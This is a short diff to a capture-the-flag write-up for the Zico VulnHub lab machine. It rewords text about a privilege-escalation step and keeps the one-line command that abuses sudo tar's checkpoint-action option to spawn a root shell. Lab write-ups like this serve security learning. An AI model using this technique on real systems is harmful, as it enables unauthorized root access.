berzerk0/GitPage/CTF-Writeups/Zico-Vulnhub.md

 ![a26](https://i.imgur.com/WnAb0Xt.png)
 <br>

-Our concept is proven. <br>
+Our privesc concept is proven. <br>
-We can just run `/bin/bash` to spawn a root shell.
+We can just run `/bin/bash` as our checkpoint commands to spawn a root shell.

 `sudo tar -xf archive.tar --checkpoint=1 --checkpoint-action=exec='/bin/bash'`